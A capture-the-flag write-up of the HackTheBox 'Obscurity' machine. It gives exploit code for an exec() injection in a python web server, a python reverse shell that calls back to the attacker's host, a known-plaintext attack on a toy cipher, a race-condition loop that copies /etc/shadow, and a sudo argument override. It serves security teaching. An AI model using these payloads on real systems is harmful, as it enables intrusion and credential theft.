[HTB] Obscurity — Write-up

bigb0ss
May 10 · 8 min read

Welcome to the Obscurity write-up! This was a medium-difficulty Linux box that required finding a flaw in the python-based web server to gain initial access. Once we have a reverse shell, we need to analyze another python script that encrypts a password file, and a Known-Plaintext Attack (“KPA”) recovers the second user’s password. Finally, for root access, we abuse a race condition in the existing BetterSSH.py script to read the /etc/shadow file and crack the password of the “root” user. Pretty fun box, so let’s get started!



Recon

Nmap

$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.168

Interesting Ports to Note:


We can read the intention/motto of this website:


But one interesting piece of content is the following. It states that the current web server’s source code (“SuperSecureServer.py”) can be viewed within a secret directory:


Web Directory Fuzzing


When we browse to /develop/SuperSecureServer.py, we can see the source code of the web server.


Initial Foothold + User Access #1 (www-data)

Source Code Analysis


Because the request path is formatted straight into a string that is handed to exec(), whatever we inject is run as python, and python can in turn run system commands through os.system():

### Example Usage of exec()
# python
Python 2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0] on linux2
>>> import os
>>> exec('os.system("whoami")')
root

Remote Code Execution (“RCE”) on the Web Server

To work out the right syntax for injecting python code, we can create a simplified version of the above vulnerable code and test it locally:

[exploit.py] - Local RCE Attempt
import os
import urllib.parse

# Close the string literal, run a command, then re-open a literal so the line still parses
path = """'; os.system("whoami");'"""
path = urllib.parse.unquote(path)
# Same pattern as the server: user input is formatted into source and exec'd
info = "output = 'Document: {}'"
exec(info.format(path))

When we run the exploit.py on our local box, we get the following output:


Nice. Let’s update our script and see if we can get RCE on the box.

[exploit.py] - Remote "Ping" Command Attempt
import os
import urllib.parse
import requests

url = 'http://10.10.10.168:8080/'
path = """'; os.system("ping -c 1 10.10.14.39");'"""
# URL Encode Mode
path = urllib.parse.unquote(path)
#info = "output = 'Document: {}'"
#exec(info.format(path))
r = requests.get(url + path)
print(r.status_code)
print(r.headers)
print(r.text)

When we run exploit.py, we can confirm a successful RCE on the box.


Reverse Shell

[exploit.py] - Python Reverse Shell
import os
import urllib.parse
import requests

url = 'http://10.10.10.168:8080/'
path = """'; import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",8055));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
# URL Encode Mode
path = urllib.parse.unquote(path)
#info = "output = 'Document: {}'"
#exec(info.format(path))
r = requests.get(url + path)
print(r.status_code)
print(r.headers)
print(r.text)

When we run exploit.py, we get a reverse shell as the “www-data” user.


User Access #2 (robert)

In order to escalate to another user (“robert”), we need to solve another python script challenge. We can see a couple of interesting files within “robert”’s home directory.

  • SuperSecureCrypt.py: a script used for encrypting/decrypting files (the screenshot shows the first part of the “SuperSecureCrypt.py” script).
  • check.txt: an ASCII text file. This file is telling us that:
check.txt + key ----[Encrypt]----> out.txt
  • out.txt: UTF-8 Unicode text. It’s the output file of the encrypted check.txt file.
  • passwordreminder.txt: also UTF-8 Unicode text. Assuming this is some type of password file, we need a valid key to decrypt it.

Known-plaintext Attack (“KPA”)

The python encrypt/decrypt script is already given to us, and we can see its help page:


It’s pretty self-explanatory. In an attempt to get the key, let’s supply the plaintext from check.txt as the key and “decrypt” out.txt:

### KPA Attack
$ python3 SuperSecureCrypt.py -i out.txt -o /dev/shm/key.txt -k 'Encrypting this file with your key should result in out.txt, make sure your key is correct!' -d
-i out.txt              # File that we want to decrypt
-k '<check.txt text>'   # Supplying the known plaintext as the key
-o /dev/shm/key.txt     # Output file; this will hold the key
-d                      # Decrypt mode

When we cat the key.txt file, we can see the key = alexandrovich (it is repeated once for every character of the input, so only the shortest repeating unit matters).

$ cat /dev/shm/key.txt
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovich

With this key, we can now decrypt the passwordreminder.txt file to get the plaintext password of the “robert” user.

### Getting robert's Password
$ python3 SuperSecureCrypt.py -i passwordreminder.txt -o /dev/shm/robert_pw.txt -k 'alexandrovich' -d
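Why handing the plaintext to the decrypt mode as the “key” returns the key: the cipher adds a repeating key to each character, so C[i] - P[i] is K[i], and the key stream leaks in full once the known plaintext is at least as long as the key. The following is an added example that models the cipher; it is not the box’s SuperSecureCrypt.py (shown only in screenshots here), and the additive structure and modulus 255 are assumptions. The plaintext and the key “alexandrovich” are the values from this write-up.

```python
# Added example modelling the box's cipher, not the SuperSecureCrypt.py source
# itself. Assumption: each character has the corresponding key character added
# to it, wrapping modulo 255.
MOD = 255

# Both values come from the write-up: the text of check.txt and the recovered key.
KNOWN_PLAINTEXT = ("Encrypting this file with your key should result in out.txt, "
                   "make sure your key is correct!")
KEY = "alexandrovich"


def encrypt(plaintext: str, key: str) -> str:
    """C[i] = (P[i] + K[i mod len(K)]) mod MOD: a repeating-key additive cipher."""
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % MOD)
                   for i, c in enumerate(plaintext))


def decrypt(ciphertext: str, key: str) -> str:
    """P[i] = (C[i] - K[i mod len(K)]) mod MOD."""
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % MOD)
                   for i, c in enumerate(ciphertext))


def recover_key_stream(ciphertext: str, known_plaintext: str) -> str:
    """Known-plaintext attack. Since C[i] - P[i] = K[i], calling decrypt() with
    the plaintext in the key slot yields the key stream; that is exactly what
    the write-up's `-k '<check.txt text>' -d` invocation does."""
    # out.txt is check.txt encrypted, so the two are the same length
    assert len(known_plaintext) >= len(ciphertext)
    return decrypt(ciphertext, known_plaintext)


def shortest_period(stream: str) -> str:
    """Collapse the repeated key stream (key.txt showed the key 7 times over)
    to the shortest unit that regenerates it."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def demo() -> str:
    """Simulate out.txt, then recover the key from it and check.txt."""
    out_txt = encrypt(KNOWN_PLAINTEXT, KEY)
    return shortest_period(recover_key_stream(out_txt, KNOWN_PLAINTEXT))
```

The 91-character check.txt text is exactly seven copies of the 13-character key, which is why key.txt showed the key repeated seven times.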

user.txt


Root Access

The first thing we may want to check is whether the “robert” user can do any sudo actions. It turns out that the user can run the BetterSSH.py script with sudo. Looks like it’s going to be another python challenge. (It’s like pythonPythonPYTHON :P)


Path #1 — Race-condition Exploit


To exploit this, we can create a simple infinite loop that copies everything from /tmp/SSH to somewhere the “robert” user can access and read. While that is running, we run the sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py command, which writes a copy of the /etc/shadow file into the /tmp directory.

$ cat /tmp/copy.sh 
#!/bin/bash
# /tmp/SSH is where BetterSSH.py drops its temporary copy of /etc/shadow
mkdir -p /tmp/SSH
# Grab whatever appears there before the script deletes it again
while true
do
  cp /tmp/SSH/* /dev/shm/ 2>/dev/null
done

Once authenticated, we can check /dev/shm and find the copied /etc/shadow file with the “root” password hash.


Feed the hash to John with the rockyou.txt wordlist. This cracks the “root” user’s password: “mercedes.”


root.txt


Path #2 — Sudo User Overwrite Exploit


This can be abused because sudo honours the last -u argument it is given. For example (the hidden column is what the script supplies, the display column is what we type):

_____Hidden_____|_______Display________
(sudo -u robert) $ id                     # Takes robert
(sudo -u robert) $ -u root id             # Takes root
(sudo -u robert) $ -u root -u robert id   # Takes robert

So, doing that, we can simply cat the root.txt file as well.


Conclusion

This was a really enjoyable box with a lot of code review and exploiting vulnerable functions within the code. It was pretty python heavy, but don’t we all like doing everything with python tho? :) Honestly, it was a really fun journey doing the Obscurity box.

Hope you enjoyed my write-up and thank you for reading!

Written by

bigb0ss

\x90\x90 — Penetration Tester | “Love Building Brain Muscles” in ExpDev, CTF, Reversing, RedTeam, Evasion Techniques

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew